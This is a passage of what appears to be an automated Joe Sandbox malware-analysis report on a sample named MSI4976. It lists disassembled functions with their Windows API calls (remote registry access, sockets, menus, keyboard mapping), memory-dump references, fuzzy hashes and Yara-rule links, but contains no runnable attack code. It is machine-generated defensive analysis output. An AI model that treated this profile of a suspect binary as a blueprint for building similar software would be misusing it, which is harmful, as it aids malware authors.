                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Rect$Client$Window$Screen
                                        • String ID:
                                        • API String ID: 1296646539-0
                                        • Opcode ID: ed6f2dc538b2aa623f26f451c45b0b656f7413f01164a96f10511403cec99bdb
                                        • Instruction ID: a3d4e64f899fe3711c7ade9b2ed4922a629e367225c4c4b76effc14a7efec640
                                        • Opcode Fuzzy Hash: ed6f2dc538b2aa623f26f451c45b0b656f7413f01164a96f10511403cec99bdb
                                        • Instruction Fuzzy Hash: 87B12779910249DBDF11CFA8C5807EDB7B5FF08310F15A52AEC5AEB654EB30AA40CB64
                                        Function 00369569 Relevance: 9.2, APIs: 6, Instructions: 204COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _memmove$__itow__swprintf
                                        • String ID:
                                        • API String ID: 3253778849-0
                                        • Opcode ID: 3cd69ee615229ba2ecfd3414ae9f88e9e9d68840e897ffa2ecb1c29f758a9b95
                                        • Instruction ID: 6bbf3797981e43259045f7f56dbdbf5fdc35f4b2727e3456dcde3c0fcfa5e897
                                        • Opcode Fuzzy Hash: 3cd69ee615229ba2ecfd3414ae9f88e9e9d68840e897ffa2ecb1c29f758a9b95
                                        • Instruction Fuzzy Hash: 9B61AC3051025A9BCF07EF60CC82EFE37A8AF05314F44855AF95A6F296EB34A905CB50
                                        Function 00382EC7 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0032CAEE: _memmove.LIBCMT ref: 0032CB2F
                                          • Part of subcall function 00383AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00382AA6,?,?), ref: 00383B0E
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00382FA0
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00382FE0
                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00383003
                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0038302C
                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0038306F
                                        • RegCloseKey.ADVAPI32(00000000), ref: 0038307C
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                        • String ID:
                                        • API String ID: 4046560759-0
                                        • Opcode ID: 5e444229d1da60776b71bd43a4bfaf5c141012b37f23088f07c424b439f6ac8d
                                        • Instruction ID: 093e73adb7be0afd7dff171fe0beaf778bc36a88c38f1f2cfc5be8845fed0cec
                                        • Opcode Fuzzy Hash: 5e444229d1da60776b71bd43a4bfaf5c141012b37f23088f07c424b439f6ac8d
                                        • Instruction Fuzzy Hash: 6D514A71118310AFC706EF64D885E6FB7E8BF89704F04495DF6868B2A1DB71EA05CB52
                                        Function 0033DB8C Relevance: 9.2, APIs: 6, Instructions: 160COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _wcscpy$_wcscat
                                        • String ID:
                                        • API String ID: 2037614760-0
                                        • Opcode ID: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                        • Instruction ID: 6996db40843dfbc72454f35b21605783cba26b4aca11d28bd110eb5f812ef183
                                        • Opcode Fuzzy Hash: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                        • Instruction Fuzzy Hash: F1510F70914625AACF13AF98E4C19BDB3B4FF04711F51904AF581AB292DBB45F82DB90
                                        Function 00362ADC Relevance: 9.2, APIs: 6, Instructions: 158COMMON
                                        Download Yara Rule
                                        APIs
                                        • VariantInit.OLEAUT32(?), ref: 00362AF6
                                        • VariantClear.OLEAUT32(00000013), ref: 00362B68
                                        • VariantClear.OLEAUT32(00000000), ref: 00362BC3
                                        • _memmove.LIBCMT ref: 00362BED
                                        • VariantClear.OLEAUT32(?), ref: 00362C3A
                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00362C68
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Variant$Clear$ChangeInitType_memmove
                                        • String ID:
                                        • API String ID: 1101466143-0
                                        • Opcode ID: 450d1e194a520cee3f751fd59754d6334d237b9e67181f04b1995e0a3ab8b6d1
                                        • Instruction ID: ee302b908c615c57f78a72149e5175bf4468df04d64937b1141d422d461131f4
                                        • Opcode Fuzzy Hash: 450d1e194a520cee3f751fd59754d6334d237b9e67181f04b1995e0a3ab8b6d1
                                        • Instruction Fuzzy Hash: FB5166B5A00609EFCB15CF58C880AAAB7B8FF4C314B168559E959DB314E730E951CFA0
                                        Function 003882DB Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetMenu.USER32(?), ref: 0038833D
                                        • GetMenuItemCount.USER32(00000000), ref: 00388374
                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0038839C
                                        • GetMenuItemID.USER32(?,?), ref: 0038840B
                                        • GetSubMenu.USER32(?,?), ref: 00388419
                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 0038846A
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Menu$Item$CountMessagePostString
                                        • String ID:
                                        • API String ID: 650687236-0
                                        • Opcode ID: 2a40bdfff85382287669aacd5e92677a04f9680dece1231a4cbb176931d217af
                                        • Instruction ID: 475a78a9adaa2d11864893ab56fb36c4e78ca8b0c6f90a7cbc09798948775fad
                                        • Opcode Fuzzy Hash: 2a40bdfff85382287669aacd5e92677a04f9680dece1231a4cbb176931d217af
                                        • Instruction Fuzzy Hash: 5E51A136E00215EFCB02EF65C941AAEB7F4EF49710F518499F811BB351DB70AE418B90
                                        Function 0037936F Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00379409
                                        • WSAGetLastError.WS2_32(00000000), ref: 00379416
                                        • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 0037943A
                                        • _strlen.LIBCMT ref: 00379484
                                        • _memmove.LIBCMT ref: 003794CA
                                        • WSAGetLastError.WS2_32(00000000), ref: 003794F7
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_memmove_strlenselect
                                        • String ID:
                                        • API String ID: 2795762555-0
                                        • Opcode ID: f426b8014650a439ad2f454292a46b08e33785f2ca04ac91127d7d6a2a8b69d7
                                        • Instruction ID: 6c773632492db2be2a629b925184fbef587a753a4e0966950f120f464b2b8221
                                        • Opcode Fuzzy Hash: f426b8014650a439ad2f454292a46b08e33785f2ca04ac91127d7d6a2a8b69d7
                                        • Instruction Fuzzy Hash: E9416075600114AFCB16EF65DD85FAEB7BDEF48310F10826AF51A9B291DB34AE01CB60
                                        Function 003654E0 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _memset.LIBCMT ref: 0036552E
                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00365579
                                        • IsMenu.USER32(00000000), ref: 00365599
                                        • CreatePopupMenu.USER32 ref: 003655CD
                                        • GetMenuItemCount.USER32(000000FF), ref: 0036562B
                                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 0036565C
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                        • String ID:
                                        • API String ID: 3311875123-0
                                        • Opcode ID: c73f7884c7edee673282b206676d4bf5f12677f4d033943b555cd995d5e5cb76
                                        • Instruction ID: 6e7e510ce14469123d9c35a85bbfdd4da3234adbda4bb1a47656eb5d899c1a89
                                        • Opcode Fuzzy Hash: c73f7884c7edee673282b206676d4bf5f12677f4d033943b555cd995d5e5cb76
                                        • Instruction Fuzzy Hash: 1A51D470600A45EFDF22CF68C88CBADBBF9AF56318F54C139E4569B298D3B09944CB51
                                        Function 0033B18C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0033AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0033AF8E
                                        • BeginPaint.USER32(?,?,?,?,?,?), ref: 0033B1C1
                                        • GetWindowRect.USER32(?,?), ref: 0033B225
                                        • ScreenToClient.USER32(?,?), ref: 0033B242
                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0033B253
                                        • EndPaint.USER32(?,?), ref: 0033B29D
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                        • String ID:
                                        • API String ID: 1827037458-0
                                        • Opcode ID: 6774374b97715a46316310c26bfb59fca1e213b9a60241511e80f8762d9c5cf7
                                        • Instruction ID: f0801d9ebb9e8dadfdd23a72483cd0b3602a641b530950a053f281a8602e3da7
                                        • Opcode Fuzzy Hash: 6774374b97715a46316310c26bfb59fca1e213b9a60241511e80f8762d9c5cf7
                                        • Instruction Fuzzy Hash: E2417E715042409FDB22DF24DCC4BBABBECEB46320F140669FAA5CB2A1C7319845DB62
                                        Function 0038E9C8 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0033B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0033B5EB
                                          • Part of subcall function 0033B58B: SelectObject.GDI32(?,00000000), ref: 0033B5FA
                                          • Part of subcall function 0033B58B: BeginPath.GDI32(?), ref: 0033B611
                                          • Part of subcall function 0033B58B: SelectObject.GDI32(?,00000000), ref: 0033B63B
                                        • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0038E9F2
                                        • LineTo.GDI32(00000000,00000003,?), ref: 0038EA06
                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0038EA14
                                        • LineTo.GDI32(00000000,00000000,?), ref: 0038EA24
                                        • EndPath.GDI32(00000000), ref: 0038EA34
                                        • StrokePath.GDI32(00000000), ref: 0038EA44
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                        • String ID:
                                        • API String ID: 43455801-0
                                        • Opcode ID: 4bb43e23e89a22bcc483e14f6ba074f60ff3a5414dcc0ee25a86cfe3b872be5b
                                        • Instruction ID: 5542bccfce39604748c7b938c11a207d187917ade423a66827e998392d236401
                                        • Opcode Fuzzy Hash: 4bb43e23e89a22bcc483e14f6ba074f60ff3a5414dcc0ee25a86cfe3b872be5b
                                        • Instruction Fuzzy Hash: DE11097600014DBFEF129F90DC88E9A7FADEB09354F048011FA1A49160D7719E55DBA0
                                        Function 0035EF91 Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDC.USER32(00000000), ref: 0035EFB6
                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 0035EFC7
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0035EFCE
                                        • ReleaseDC.USER32(00000000,00000000), ref: 0035EFD6
                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0035EFED
                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 0035EFFF
                                          • Part of subcall function 0035A83B: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,0035A79D,00000000,00000000,?,0035AB73), ref: 0035B2CA
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: CapsDevice$ExceptionRaiseRelease
                                        • String ID:
                                        • API String ID: 603618608-0
                                        • Opcode ID: f725962f52f9d4e9ef99da9bca9c9987df4485ea07b7289298bd699bd6a13330
                                        • Instruction ID: 24208af95c8ef5f24eeed347d06be6d06915e73437908c5780a0847bb047a36d
                                        • Opcode Fuzzy Hash: f725962f52f9d4e9ef99da9bca9c9987df4485ea07b7289298bd699bd6a13330
                                        • Instruction Fuzzy Hash: F201A7B5A00305BFEB119BA59C45F5EBFBCEB49751F054066FE05AB290D6709D00CF61
                                        Function 003487D7 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __init_pointers.LIBCMT ref: 003487D7
                                          • Part of subcall function 00341E5A: __initp_misc_winsig.LIBCMT ref: 00341E7E
                                          • Part of subcall function 00341E5A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00348BE1
                                          • Part of subcall function 00341E5A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00348BF5
                                          • Part of subcall function 00341E5A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00348C08
                                          • Part of subcall function 00341E5A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00348C1B
                                          • Part of subcall function 00341E5A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00348C2E
                                          • Part of subcall function 00341E5A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00348C41
                                          • Part of subcall function 00341E5A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00348C54
                                          • Part of subcall function 00341E5A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00348C67
                                          • Part of subcall function 00341E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00348C7A
                                          • Part of subcall function 00341E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00348C8D
                                          • Part of subcall function 00341E5A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00348CA0
                                          • Part of subcall function 00341E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00348CB3
                                          • Part of subcall function 00341E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00348CC6
                                          • Part of subcall function 00341E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00348CD9
                                          • Part of subcall function 00341E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00348CEC
                                          • Part of subcall function 00341E5A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00348CFF
                                        • __mtinitlocks.LIBCMT ref: 003487DC
                                          • Part of subcall function 00348AB3: InitializeCriticalSectionAndSpinCount.KERNEL32(003DAC68,00000FA0,?,?,003487E1,00346AFA,003D67D8,00000014), ref: 00348AD1
                                        • __mtterm.LIBCMT ref: 003487E5
                                          • Part of subcall function 0034884D: RtlDeleteCriticalSection.NTDLL(00000000), ref: 003489CF
                                          • Part of subcall function 0034884D: _free.LIBCMT ref: 003489D6
                                          • Part of subcall function 0034884D: RtlDeleteCriticalSection.NTDLL(003DAC68), ref: 003489F8
                                        • __calloc_crt.LIBCMT ref: 0034880A
                                        • GetCurrentThreadId.KERNEL32 ref: 00348833
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                        • String ID:
                                        • API String ID: 2942034483-0
                                        • Opcode ID: 6a516d75efda10b16c72710ac73fc3e9d2c640d8b265a7e1066808e1ac7f0941
                                        • Instruction ID: fa4283bd86b2ecde7fca2d832d6daf6eadaec7b606781ff16b46e67814a90092
                                        • Opcode Fuzzy Hash: 6a516d75efda10b16c72710ac73fc3e9d2c640d8b265a7e1066808e1ac7f0941
                                        • Instruction Fuzzy Hash: 1CF0B43311AB515AE26777787C0769E2AC4CF02B34F610A2AF464DD0D2FF50B8414150
                                        Function 0036A3D2 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                        • String ID:
                                        • API String ID: 1423608774-0
                                        • Opcode ID: f916dd32d678710732f7cb1a4bf48ef9f9b0f32c93d98cba2f0625b59c91a2b9
                                        • Instruction ID: da376fc66ed4a05a4c05f321353b45e082f803f1a7509e561cba7a13c30fe0b8
                                        • Opcode Fuzzy Hash: f916dd32d678710732f7cb1a4bf48ef9f9b0f32c93d98cba2f0625b59c91a2b9
                                        • Instruction Fuzzy Hash: 1B01F436101611EBD7172B54EC48EEB7BADFF8A702F114529F503A69A5CB74AC00CF61
                                        Function 00321867 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00321898
                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 003218A0
                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 003218AB
                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 003218B6
                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 003218BE
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 003218C6
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
